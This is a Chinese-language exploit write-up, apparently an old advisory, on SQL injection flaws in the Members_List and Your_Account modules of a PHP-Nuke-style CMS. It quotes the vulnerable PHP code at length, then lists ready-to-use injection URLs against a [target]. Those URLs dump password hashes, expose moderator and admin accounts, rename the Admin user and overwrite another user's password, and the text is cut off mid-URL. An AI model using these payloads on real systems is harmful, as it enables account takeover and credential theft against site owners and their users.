利用SQL注入缺陷进行攻击的方法及代码

SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”，攻击者使用下列攻击方法及代码能利用该缺陷：

PHP代码/位置：

?/modules/Members_List/index.php :

------------------------------------------------------------------------

[...]

$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";

$select = "select uid, name, uname, femail, url from

".$user_prefix."_users ";

$where = "where uname != Anonymous ";

if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {

$where .= "AND uname like ".$letter."% ";

} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {

$where .= "AND uname REGEXP \"^\[1-9]\" ";

} else {

$where .= "";

}

$sort = "order by $sortby";

$limit = " ASC LIMIT ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);

$num_rows_per_order = mysql_result($count_result,0,0);

$result = sql_query($select.$where.$sort.$limit, $dbi) or die();

echo " ";

if ( $letter != "front" ) {

echo "<table width=\"100%\" border=\"0\"

cellspacing=\"1\"><tr>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\">"._NICKNAME."</td>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\">"._REALNAME."</td>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\">"._EMAIL."</td>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\">"._URL."</td>\n";

$cols = 4;

[...]

------------------------------------------------------------------------

/modules/Your_Account/index.php :

switch($op) {

[...]

case "mailpasswd":

mail_password($uname, $code);

break;

case "userinfo":

userinfo($uname, $bypass, $hid, $url);

break;

case "login":

break;

[...]

case "saveuser":

saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,

$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,

$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);

break;

[...]

case "savehome":

savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,

$popmeson);

break;

case "savetheme":

savetheme($uid, $theme);

break;

[...]

case "savecomm":

savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);

break;

[...]

}

------------------------------------------------------------------------

/modules/Your_Account/index.php :

[...]

function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,

$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,

$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {

global $user, $Ｃookie, $userinfo, $EditedMessage, $user_prefix, $dbi,

$module_name;

Ｃookiedecode($user);

$check = $Ｃookie[1];

$check2 = $Ｃookie[2];

$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

if (($uid == $vuid) AND ($check2 == $ccpass)) {

if (!eregi("http://";, $url)) {

$url = "http://$url";

}

if ((isset($pass)) && ("$pass" != "$vpass")) {

echo "<center>"._PASSDIFFERENT."</center>";

} elseif (($pass != "") && (strlen($pass) < $minpass)) {

echo "<center>"._YOUPASSMUSTBE." $minpass

"._CHARLONG."</center>";

} else {

if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =

FixQuotes($bio); }

if ($pass != "") {

Ｃookiedecode($user);

sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);

$pass = md5($pass);

sql_query("update ".$user_prefix."_users set name=$realname,

email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio ,

user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,

user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,

user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,

newsletter=$newsletter where uid=$uid", $dbi);

$result = sql_query("select uid, uname, pass, storynum, umode, uorder,

thold, noscore, ublockon, theme from ".$user_prefix."_users where

uname=$uname and pass=$pass", $dbi);

if(sql_num_rows($result, $dbi)==1) {

$userinfo = sql_fetch_array($result, $dbi);

doＣookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],

$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],

$userinfo[theme],$userinfo[commentmax]);

} else {

echo "<center>"._SOMETHINGWRONG."</center> ";

}

sql_query("UNLOCK TABLES", $dbi);

} else {

sql_query("update ".$user_prefix."_users set name=$realname,

email=$email, femail=$femail, url=$url, bio=$bio,

user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,

user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,

user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,

newsletter=$newsletter where uid=$uid", $dbi);

if ($attach) {

$a = 1;

} else {

$a = 0;

}

Header("Location: modules.php?name=$module_name");

}

[...]

function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,

$popmeson) {

global $user, $Ｃookie, $userinfo, $user_prefix, $dbi, $module_name;

Ｃookiedecode($user);

$check = $Ｃookie[1];

$check2 = $Ｃookie[2];

$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

if (($uid == $vuid) AND ($check2 == $ccpass)) {

if(isset($ublockon)) $ublockon=1; else $ublockon=0;

$ublock = FixQuotes($ublock);

sql_query("update ".$user_prefix."_users set storynum=$storynum,

ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast,

popmeson=$popmeson where uid=$uid", $dbi);

getusrinfo($user);

doＣookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],

$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],

$userinfo[theme],$userinfo[commentmax]);

Header("Location: modules.php?name=$module_name");

}

function savetheme($uid, $theme) {

global $user, $Ｃookie, $userinfo, $user_prefix, $dbi, $module_name;

Ｃookiedecode($user);

$check = $Ｃookie[1];

$check2 = $Ｃookie[2];

$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

if (($uid == $vuid) AND ($check2 == $ccpass)) {

sql_query("update ".$user_prefix."_users set theme=$theme where

uid=$uid", $dbi);

getusrinfo($user);

doＣookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],

$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],

$userinfo[theme],$userinfo[commentmax]);

Header("Location: modules.php?name=$module_name&theme=$theme");

}

[...]

function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,

$commentmax) {

global $user, $Ｃookie, $userinfo, $user_prefix, $dbi, $module_name;

Ｃookiedecode($user);

$check = $Ｃookie[1];

$check2 = $Ｃookie[2];

$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

if (($uid == $vuid) AND ($check2 == $ccpass)) {

if(isset($noscore)) $noscore=1; else $noscore=0;

sql_query("update ".$user_prefix."_users set umode=$umode,

uorder=$uorder, thold=$thold, noscore=$noscore,

commentmax=$commentmax where uid=$uid", $dbi);

getusrinfo($user);

doＣookie($userinfo[uid],$userinfo[uname],$userinfo[pass],

$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],

$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);

Header("Location: modules.php?name=$module_name");

}

[...]

------------------------------------------------------------------------

/modules/Your_Account/index.php :

[...]

function mail_password($uname, $code) {

global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,

$module_name;

$result = sql_query("select email, pass from ".$user_prefix."_users

where (uname=$uname)", $dbi);

if(!$result) {

include("header.php");

OpenTable();

echo "<center>"._SORRYNOUSERINFO."</center>";

CloseTable();

include("footer.php");

[...]

------------------------------------------------------------------------

[...]

function userinfo($uname, $bypass=0, $hid=0, $url=0) {

global $user, $Ｃookie, $sitename, $prefix, $user_prefix, $dbi, $admin,

$broadcast_msg, $my_headlines, $module_name;

$result = sql_query("select uid, femail, url, bio, user_avatar,

user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,

user_sig, pass, newsletter from ".$user_prefix."_users where

uname=$uname", $dbi);

$userinfo = sql_fetch_array($result, $dbi);

[...]

------------------------------------------------------------------------

[...]

function login($uname, $pass) {

global $setinfo, $user_prefix, $dbi, $module_name;

$result = sql_query("select pass, uid, storynum, umode, uorder, thold,

noscore, ublockon, theme, commentmax from ".$user_prefix."_users where

uname=$uname", $dbi);

$setinfo = sql_fetch_array($result, $dbi);

[...]

}

[...]

------------------------------------------------------------------------

Members_List模块：

- 显示用户:

http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- 显示用户:

http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- 显示moderators :

http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*

- 显示管理员:

http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*

- 显示所有以“abc”开头的用户 :

http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*

Your_Account模块 :

- 将“Admind”用户更名为“Hophophop” :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]

- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”：

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,